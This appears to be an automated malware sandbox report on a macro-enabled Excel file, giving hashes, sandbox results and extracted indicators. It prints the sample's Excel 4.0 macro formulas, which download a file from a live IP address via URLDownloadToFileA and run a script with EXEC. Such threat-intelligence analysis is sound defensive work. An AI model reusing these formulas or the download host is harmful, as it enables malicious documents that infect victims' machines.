General
-
Target
284f5287a79857e0b914ea629491a8ed
-
Size
6KB
-
Sample
231221-3ms75sbddr
-
MD5
284f5287a79857e0b914ea629491a8ed
-
SHA1
07345a717af8a7b1d74a43e61515bf5a67f969ec
-
SHA256
d7718ab50d124c780a5f0c2b6f6449cc73e4b2e778f785e4b93a468abe7e7313
-
SHA512
269dab2fdeaad46db0cb92f5da9e7a15ffcd9dd7edcd6b386490c74506101f802f8e1f7d9cd4fcf1f321648800cebf55541109bd394db7dab76bc07a28c57bf2
-
SSDEEP
192:NDSRuS3brA2OmmfRq8UhHFBFYu0b98yDP+I+9:Nyu0M2w81FYtb98yDP+P
Static task
static1
Behavioral task
behavioral1
Sample
284f5287a79857e0b914ea629491a8ed.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
284f5287a79857e0b914ea629491a8ed.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
284f5287a79857e0b914ea629491a8ed
-
Size
6KB
-
MD5
284f5287a79857e0b914ea629491a8ed
-
SHA1
07345a717af8a7b1d74a43e61515bf5a67f969ec
-
SHA256
d7718ab50d124c780a5f0c2b6f6449cc73e4b2e778f785e4b93a468abe7e7313
-
SHA512
269dab2fdeaad46db0cb92f5da9e7a15ffcd9dd7edcd6b386490c74506101f802f8e1f7d9cd4fcf1f321648800cebf55541109bd394db7dab76bc07a28c57bf2
-
SSDEEP
192:NDSRuS3brA2OmmfRq8UhHFBFYu0b98yDP+I+9:Nyu0M2w81FYtb98yDP+P
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-